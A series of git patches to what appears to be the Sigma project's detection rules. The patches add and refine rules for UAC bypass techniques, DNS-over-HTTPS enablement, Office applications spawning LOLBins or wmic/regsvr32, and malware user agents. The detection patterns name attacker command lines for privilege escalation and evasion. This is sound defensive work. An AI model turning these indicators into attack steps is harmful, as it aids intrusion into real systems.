--- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -18,7 +18,6 @@ logsource: product: windows detection: selection: - Image: C:\Windows\explorer.exe - TargetObject|endswith: '-1???_Classes\ms-settings\shell\open\command\SymbolicLinkValue' - Details|contains: '-1???\Software\Classes\{' + TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' + Details|contains: '\Software\Classes\{' condition: selection From 9dc8d3856561d6ee77c8354f9af540dbd8464fb8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 31 Aug 2021 09:14:14 -0500 Subject: [PATCH 0647/1367] Create sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml new file mode 100644 index 00000000..e3ba5eb6 --- /dev/null +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -0,0 +1,34 @@ +title: DNS-over-HTTPS Enabled by Registry +id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 +date: 2021/07/22 +description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. +author: Austin Songer +status: experimental +references: + - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html + - https://github.com/elastic/detection-rules/issues/1371 + - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode +tags: + - attack.defense_evasion + - attack.t1140 + - attack.t1112 +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + Details: 'DWORD (1)' + selection2: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + Details: 'DWORD (secure)' + selection3: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + Details: 'DWORD (1)' + condition: selection1 or selection2 or selection3 +falsepositives: +- Unlikely +level: medium From 59d8e0b8668dd8762723e8bed3de11ad877bd7b5 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 16:18:05 +0200 Subject: [PATCH 0648/1367] add System IntegrityLevel to uac bypass rules, the level is not used most of the time, but might --- .../process_creation/win_cmstp_com_object_access.yml | 4 +++- .../process_creation/win_uac_bypass_changepk_slui.yml | 4 +++- .../windows/process_creation/win_uac_bypass_cleanmgr.yml | 4 +++- .../process_creation/win_uac_bypass_consent_comctl32.yml | 4 +++- .../windows/process_creation/win_uac_bypass_dismhost.yml | 8 ++++++-- .../windows/process_creation/win_uac_bypass_ieinstal.yml | 4 +++- .../process_creation/win_uac_bypass_msconfig_gui.yml | 4 +++- .../win_uac_bypass_ntfs_reparse_point.yml | 8 ++++++-- .../process_creation/win_uac_bypass_pkgmgr_dism.yml | 6 ++++-- rules/windows/process_creation/win_uac_bypass_winsat.yml | 4 +++- rules/windows/process_creation/win_uac_bypass_wmp.yml | 8 ++++++-- rules/windows/process_creation/win_uac_bypass_wsreset.yml | 4 +++- 12 files changed, 46 insertions(+), 16 deletions(-) diff --git a/rules/windows/process_creation/win_cmstp_com_object_access.yml b/rules/windows/process_creation/win_cmstp_com_object_access.yml index f0dc77b3..7a12cc4a 100644 --- a/rules/windows/process_creation/win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/win_cmstp_com_object_access.yml @@ -26,7 +26,9 @@ logsource: detection: selection: ParentImage|endswith: '\DllHost.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentCommandLine|contains: - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' diff --git a/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml index b7c37d4e..35c63c90 100644 --- a/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml +++ b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml @@ -19,7 +19,9 @@ detection: selection: Image|endswith: '\changepk.exe' ParentImage|endswith: '\slui.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection falsepositives: - Unknown diff --git a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml index 91546a9b..3ed387b3 100644 --- a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml +++ b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml @@ -20,5 +20,7 @@ detection: selection: CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:' ParentCommandLine: 'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml index 61fb4b62..e690075d 100644 --- a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml +++ b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml @@ -20,5 +20,7 @@ detection: selection: ParentImage|endswith: '\consent.exe' Image|endswith: '\werfault.exe' - IntegrityLevel: 'System' + IntegrityLevel: + - 'High' + - 'System' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml index f0c206f6..6647013e 100644 --- a/rules/windows/process_creation/win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml @@ -22,12 +22,16 @@ detection: - 'C:\Users\' - '\AppData\Local\Temp\' - '\DismHost.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' selection2: Image|contains|all: - 'C:\Users\' - '\AppData\Local\Temp\' - '\DismHost.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:' condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml index e45aa045..a6458810 100644 --- a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml +++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml @@ -18,7 +18,9 @@ logsource: product: windows detection: selection: - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentImage|endswith: '\ieinstal.exe' Image|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml index 7d2f6aae..a7d65fd2 100644 --- a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml +++ b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml @@ -18,7 +18,9 @@ logsource: product: windows detection: selection: - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentImage|endswith: '\AppData\Local\Temp\pkgmgr.exe' CommandLine: '"C:\Windows\system32\msconfig.exe" -5' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml index a0f828e8..4319cada 100644 --- a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml @@ -20,10 +20,14 @@ detection: selection1: CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' CommandLine|endswith: '\AppData\Local\Temp\update.msu' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' selection2: ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Temp\' diff --git a/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml index 570938ee..75d1a14d 100644 --- a/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml +++ b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml @@ -17,8 +17,10 @@ detection: selection: ParentImage|endswith: '\pkgmgr.exe' Image|endswith: '\dism.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_winsat.yml b/rules/windows/process_creation/win_uac_bypass_winsat.yml index 49773539..c9ec3b38 100644 --- a/rules/windows/process_creation/win_uac_bypass_winsat.yml +++ b/rules/windows/process_creation/win_uac_bypass_winsat.yml @@ -18,7 +18,9 @@ logsource: product: windows detection: selection: - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentImage|endswith: '\AppData\Local\Temp\system32\winsat.exe' ParentCommandLine|contains: 'C:\Windows \system32\winsat.exe' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_wmp.yml b/rules/windows/process_creation/win_uac_bypass_wmp.yml index 6b1691be..25ab25c7 100644 --- a/rules/windows/process_creation/win_uac_bypass_wmp.yml +++ b/rules/windows/process_creation/win_uac_bypass_wmp.yml @@ -19,9 +19,13 @@ logsource: detection: selection1: Image: 'C:\Program Files\Windows Media Player\osk.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' selection2: Image: 'C:\Windows\System32\cmd.exe' ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_wsreset.yml b/rules/windows/process_creation/win_uac_bypass_wsreset.yml index e45b8880..8e4707a9 100644 --- a/rules/windows/process_creation/win_uac_bypass_wsreset.yml +++ b/rules/windows/process_creation/win_uac_bypass_wsreset.yml @@ -18,7 +18,9 @@ logsource: detection: selection: Image|endswith: '\wsreset.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection falsepositives: - Unknown From add1ad40f86969cc0ca302b3d12d8b4590feed24 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 16:23:32 +0200 Subject: [PATCH 0649/1367] additional UAC bypass rule --- .../win_uac_bypass_computerdefaults.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation/win_uac_bypass_computerdefaults.yml diff --git a/rules/windows/process_creation/win_uac_bypass_computerdefaults.yml b/rules/windows/process_creation/win_uac_bypass_computerdefaults.yml new file mode 100644 index 00000000..6677408e --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_computerdefaults.yml @@ -0,0 +1,29 @@ +title: UAC Bypass Using ComputerDefaults +id: 3c05e90d-7eba-4324-9972-5d7f711a60a8 +description: Detects the pattern of UAC Bypass using computerdefaults.exe (UACMe 59) +author: Christian Burkard +date: 2021/08/31 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +logsource: + category: process_creation + product: windows +detection: + selection: + IntegrityLevel: + - 'High' + - 'System' + Image: 'C:\Windows\System32\ComputerDefaults.exe' + filter: + ParentImage|contains: + - ':\Windows\System32' + - ':\Program Files' + condition: selection and not filter +falsepositives: + - Unknown +level: high From cff572b7527e251f5024f8dfc1bef1a13f36785d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 31 Aug 2021 17:11:04 +0200 Subject: [PATCH 0650/1367] Update sysmon_dns_over_https_enabled.yml --- .../registry_event/sysmon_dns_over_https_enabled.yml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index e3ba5eb6..c7687eed 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -17,16 +17,13 @@ logsource: category: registry_event detection: selection1: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' selection2: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' selection3: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' Details: 'DWORD (1)' condition: selection1 or selection2 or selection3 falsepositives: From 9b2006027546b922d4a8ca34585ea55aca9a4a0b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 31 Aug 2021 17:14:19 +0200 Subject: [PATCH 0651/1367] SideWalk UA --- rules/proxy/proxy_ua_apt.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/proxy/proxy_ua_apt.yml b/rules/proxy/proxy_ua_apt.yml index 0c51fd03..d7298a8c 100644 --- a/rules/proxy/proxy_ua_apt.yml +++ b/rules/proxy/proxy_ua_apt.yml @@ -50,6 +50,7 @@ detection: - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657 - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/ - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ + - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin condition: selection fields: - ClientIP From b0efaf5a510ebd358e6f2b548af09b6493e0d4d1 Mon Sep 17 00:00:00 2001 From: Young Date: Tue, 31 Aug 2021 18:15:46 -0700 Subject: [PATCH 0652/1367] changed adjustMatches function to combine aall atomic matches into a single bool statement --- .DS_Store | Bin 8196 -> 8196 bytes tools/sigma/backends/opensearch.py | 36 +++++++++++++++++++++-------- 2 files changed, 26 insertions(+), 10 deletions(-) diff --git a/.DS_Store b/.DS_Store index ec1c03f419ae50d6a9f11096836056b8ba0ed345..b4c524a393c6a725f38a82ba14af4978c2a95449 100644 GIT binary patch delta 57 rcmZp1XmQx!EXr?cVOp!BP;F^sprc@7Y&Lnjkoo3L(Ov8~B&wMJ-?9*i delta 57 rcmZp1XmQx!EXr?UZdR+KP;F^wtfOFRVmf)dkoo3L(Ov8~B&wMJ;06$l diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index b89c9130..a2b951cb 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -169,18 +169,34 @@ def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> Li return result ''' -Wraps match statements inside bool-must statement. +Group atomic match statements together into parent clause and wrap inside bool statement. +Maintain group match statements, which are already wrapped in bool statement. ''' -def adjust_matches(matches: List[dict]) -> List[dict]: +def adjust_matches(matches: List[dict], clause) -> List[dict]: + atomicMatches = [] + combinedAtomicMatches = [] + groupMatches = [] + + # Determine if current statement is an atomic match or bool group statement for index in range(len(matches)): match = matches[index] if "match" in match.keys(): - matches[index] = { + atomicMatches.append(match) + else: + groupMatches.append(match) + + # If any atomic matches, combine under parent clause wrapped in a single bool statement + if atomicMatches: + # If there's only one atomic match, it should be wrapped in a bool-must regardless of the parent clause + clause = "must" if len(atomicMatches) == 1 else clause + + combinedAtomicMatches = [{ "bool": { - "must": [match] + clause: atomicMatches } - } - return matches + }] + + return combinedAtomicMatches + groupMatches def contains_group(booleanArr: List[Boolean]) -> bool: for boolean in booleanArr: @@ -198,7 +214,7 @@ def translate_ary(ary: Ary) -> dict: while translateIndex < len(parsedTranslation): parsedExpression = parsedTranslation[translateIndex] currMatches = [] - clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements + clause = "must" # default clause is "must"; clause is "should" if multiple consecutive "or" statements # Statement was joined by "or" if len(parsedExpression) == 1: @@ -208,7 +224,7 @@ def translate_ary(ary: Ary) -> dict: tempIndex += 1 counter += 1 - # If there's more than one, use "should" clase instead of "must" + # If there's more than one, use "should" clause instead of "must" if counter > 1: clause = "should" parsedExpression = [] @@ -223,9 +239,9 @@ def translate_ary(ary: Ary) -> dict: for boolean in parsedExpression: currMatches.append(translate_boolean(boolean)) - # If bool array contains a Group, match statements must also be wrapped in a bool. + # If bool array contains a Group which is wrapped in a bool, match statements must also be wrapped in a bool. if contains_group(parsedExpression): - currMatches = adjust_matches(currMatches) + currMatches = adjust_matches(currMatches, clause) currQuery = { "bool": { From 900f71e6b265bb88311c5fb6925accb0e7f7265b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:50:44 -0600 Subject: [PATCH 0653/1367] Rule Update Review Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...ocess_Creations_by_Office_applications.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index db13196c..a91cfcc2 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,25 +1,23 @@ -title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +title: LOLBins Process Created With Office Application description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: Image|endswith: @@ -35,5 +33,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file + - Unknown +level: high From d5fa226180fd5ed5f6ec3f554d23e1faeef35004 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:54:32 -0600 Subject: [PATCH 0654/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...creations_with_Wmiprvse_parent_process.yml | 24 +++++++++---------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 3acabbea..f08b2b5a 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,25 +1,23 @@ -title: LOLBins process creations with Wmiprvse parent process(sysmon) +title: LOLBins Process Created With WmiPrvSE description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: Image|endswith: @@ -34,4 +32,4 @@ detection: condition: selection1 AND selection2 AND selection3 falsepositives: - "FPs are possible here, but some LOLBins weren't excluded for obvious reasons." -level: high \ No newline at end of file +level: high From c7c49c55d29852443c25058079cb411e0b2e713e Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:58:09 -0600 Subject: [PATCH 0655/1367] Updated Rule - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ..._proxy_executing_regsvr32_with_payload.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 71e30907..bd8f9bfb 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -1,25 +1,23 @@ -title: Monitor Excel from proxy executing regsvr32 with payload (Sysmon) +title: Excel Proxy Executing Regsvr32 With Payload description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: - Image: '*\wbem\WMIC.exe' @@ -45,5 +43,5 @@ detection: - 'call' condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From fa3b882fdc8a628aaf498055a4f1498e236ec704 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 21:58:50 -0600 Subject: [PATCH 0656/1367] Updated Rule Removed " " from falsepositives section --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index f08b2b5a..055e8faf 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -31,5 +31,5 @@ detection: - "\\wbem\\WmiPrvSE.exe" condition: selection1 AND selection2 AND selection3 falsepositives: -- "FPs are possible here, but some LOLBins weren't excluded for obvious reasons." +- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. level: high From d5f73a8910f4a7742aec5040e37ad119b79413fb Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:03:31 -0600 Subject: [PATCH 0657/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...ice_applications_using_file_extentions.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 61716031..6f73f778 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,25 +1,23 @@ -title: monitor executable and script files creation by Office applications, using file extentions (Sysmon). +title: Created Executables and Script Files By Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: Windows - service: Sysmon category: process_creation detection: - description: Please add more file extentions to the logic of your choice. + #useful_information: Please add more file extentions to the logic of your choice. selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 11 selection2: Image|endswith: @@ -40,5 +38,5 @@ detection: - ".proj" condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 785fc98ee3e2bb966457032af512e6e6f2ae7e55 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:05:10 -0600 Subject: [PATCH 0658/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. - Removed the service: Sysmon, updated selection1. --- ...Applications_Spawning_WMI_command-line.yml | 26 +++++++++---------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index fbeedaad..92cb14f0 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -1,25 +1,23 @@ -title: Office Applications Spawning WMI command-line (sysmon) +title: Office Applications Spawning Wmi Cli description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- 